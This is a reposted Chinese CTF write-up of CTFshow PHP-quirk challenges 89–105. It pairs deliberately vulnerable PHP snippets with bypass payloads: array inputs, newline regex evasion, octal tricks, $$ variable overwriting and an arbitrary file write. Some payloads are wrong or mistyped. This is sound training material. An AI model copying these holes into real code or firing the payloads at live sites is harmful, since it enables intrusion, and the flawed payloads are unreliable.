CTFshow web入門 (php特性）

本文轉載自查看原文 2020-10-11 18:01 1729 WEB/ ctf wp

web 89

<?php


include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

構造數組繞過即可

payload:?mun[]=1

web 90

web 91

<?php

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}

/i  表示匹配的時候不區分大小寫

/m 表示多行匹配，什么是多行匹配呢？就是匹配換行符兩端的潛在匹配。影響正則中的^$符號

這里主要的突破點就是/m，我們可以看到第一個preg_match()函數，有個/m，而第二個正則則沒有，我們可以利用換行進行繞過

payload:?cmd=%0aphp

注：%0a是換行的意思

web 92

和web90是一樣的

payload：?num=0x117c

web 93

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

過濾了字母，十六進制弄不了，那就改八進制

payload：?num=010574

4476的八進制為10574

web 94

<?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

strpos()

對於strpos()函數，我們可以利用換行進行繞過（%0a）

payload:?num=%0a010574

也可以小數點繞過

payload：?num=4476.0

因為intval()函數只讀取整數部分

還可以八進制繞過(%20是空格的url編碼形式)

payload：?num=%20010576

web 95

<?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

八進制繞過

payload：?num=%20010576

Payload: ?num=+010574

web 96

<?php

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }


}

paylaod:?u=./flag.php

意思就是說顯示當前目錄下的flag.php文件

web 97

<?php


include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

md5碰撞

payload: a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

payload:a[]=1&b[]=1

web 98

<?php

include("flag.php");
$_GET?$_GET=&$_POST:'flag';  
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?>

稀里糊塗的就出flag了，講下大概思路

主要是三元運算符和變量覆蓋

$_GET?$_GET=&$_POST:'flag'; 意思就是說如果存在GET請求，則將POAT請求覆蓋掉GET請求

highlight_file($_GET['HTTP_FLAG']=='flag'?$flag: __FILE __); 意思就是說GET傳參HTTP_FLAG的值為flag，則讀取flag？

所以我就構造了GET：?flag=123

POST：HTTP_FLAG=flag

然后就得到了flag

web 99

<?php

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

之后在cat flag36d.php即可

web 100

web 104

<?php

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}

?>

類似md5碰撞

payload：

GET：v2=1

POST: v1[]=2

web 105

<?php

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你還想要flag嘛？';
$suces='既然你想要那給你吧！';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

?>

先放payload:

foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
//這是一步變量覆蓋，我們傳入suces=flag,最終會得到
//$suces=$flag，就是說將flag賦值給了suces變量

我們可以看到在只有GET請求的時候，報的是error錯誤，這也就說明我們只要將flag賦值給error變量即可

foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
//我們POST傳入error=suces,最終得到$error=$suces,結合GET請求，推出$error=$flag，即成功將flag的值賦值給了error變量

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 ctfshow web入門php特性 ctfshow_web入門 PHP特性 ctfshow之Web入門 PHP特性 89--不定時 Ctfshow Web入門 - PHP特性（89-102） CTFshow web入門 (爆破） CTFshow web入門 (命令執行） CTFshow web入門 (文件包含） ctfshow_web入門 xss Ctfshow web入門 21 - 爆破（1） CTFshow web入門 (信息收集)